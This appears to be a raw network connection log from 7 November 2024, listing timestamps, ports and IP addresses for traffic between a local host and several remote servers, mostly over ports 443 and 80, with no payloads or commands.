Nov 7, 2024 07:33:23.167102098 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167135954 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167150021 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.167162895 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167205095 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.167299986 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167500973 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167542934 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.167547941 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167654991 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.167695999 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.167700052 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168298960 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168355942 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.168359995 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168417931 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168592930 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168613911 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.168620110 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.168658972 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.168663979 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.170355082 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.170393944 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.170398951 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.173365116 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.173413992 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.173418999 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.182190895 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.182240009 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.182245016 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.186208010 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.186362982 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.186367989 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.191360950 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.191416025 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.191421986 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.197464943 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.197537899 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.197544098 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.203321934 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.203408003 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.203413010 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.204411030 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.204502106 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.209300041 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.209345102 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.209351063 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.215532064 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.215574980 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.215579987 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.220156908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.220213890 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.221609116 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.221673965 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.221678972 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.227473974 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.227590084 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.227595091 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.233656883 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.233701944 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.233707905 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.239543915 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.239667892 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.239672899 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.246021986 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.246028900 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.250725031 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.255095005 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.255112886 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.255172014 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.257678986 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.257716894 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.258008957 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.258943081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.258990049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259025097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259042025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259066105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259085894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259274960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259287119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259299040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259310007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259326935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259334087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259361982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259372950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259763956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259776115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259784937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259802103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259814978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.259833097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.259865999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260293007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260303974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260314941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260340929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260364056 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260677099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260688066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260698080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260709047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260720968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260730982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260734081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260742903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260752916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260765076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.260771036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260793924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.260804892 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.261600018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261624098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261635065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261646032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261656046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261667013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261678934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.261682034 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.261697054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.261713982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.262335062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262346029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262356043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262367964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262378931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262388945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262392998 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.262401104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262412071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262423992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.262423992 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.262454033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.262526035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.263221979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.263233900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.263242960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.263254881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.263263941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.263283968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.263303041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.265187025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.265264988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.265275955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.265316010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.268343925 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.268374920 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.268389940 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.268399000 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.268409967 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.268449068 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.268501997 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.269318104 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.269340038 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.269398928 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.269582987 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.269825935 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.269838095 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.270436049 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.270447969 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.274082899 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.274156094 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.274162054 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.283952951 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.283997059 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.284009933 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284127951 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284174919 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.284179926 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284332037 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284368038 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284368038 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.284375906 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.284424067 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.285020113 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.290107965 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.290155888 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.290159941 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.296055079 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.296091080 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.296106100 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.296113014 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.296159983 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.296227932 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.302190065 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.302237988 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.302242994 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.308330059 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.308391094 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.308434963 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.308442116 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.308486938 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.310672045 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.310689926 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.311995029 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.312022924 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.312294960 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.312462091 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.312473059 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.314199924 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.315325022 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.319854021 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.319864988 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.319987059 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.320213079 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.320271969 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.320278883 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.326133013 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.326180935 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.326186895 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.326232910 CET	49890	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.326242924 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.327269077 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.328188896 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.328200102 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.328969955 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.328974009 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.332321882 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.332403898 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.332408905 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.338283062 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.338352919 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.338360071 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.341463089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.341500044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.341514111 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.341531038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.344271898 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.344321966 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.344341993 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.344350100 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.344391108 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.350346088 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.356456995 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.356508970 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.356513977 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.378314018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378376961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378387928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378426075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378458023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378541946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378592014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378618956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378628969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378660917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378669024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378894091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378905058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378917933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.378928900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378958941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.378973007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.379223108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379234076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379251003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379260063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379270077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379278898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.379281998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379297972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379332066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.379342079 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.379869938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379880905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379892111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.379915953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.379940033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.380265951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380281925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380292892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380309105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380310059 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.380321026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380331039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380342960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380342960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.380352020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380363941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.380376101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.380397081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.380405903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.381218910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381230116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381237984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381253004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381270885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381275892 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.381282091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381292105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381304026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381315947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.381346941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.381439924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.382164001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382179976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382189989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382200956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382211924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382215977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.382222891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382232904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382244110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382250071 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.382256031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.382268906 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.382285118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.382311106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.385123014 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.385171890 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.385178089 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.385253906 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.385305882 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.385309935 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.387402058 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.387526035 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.387531996 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.391052961 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.391146898 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.391153097 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.400845051 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.400896072 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.400902987 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401072979 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401109934 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.401114941 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401356936 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401400089 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.401405096 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401848078 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.401890993 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.401895046 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.406909943 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.407011032 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.407016039 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.410521030 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.410598993 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.410604954 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.416585922 CET	80	49882	185.215.113.16	192.168.2.4
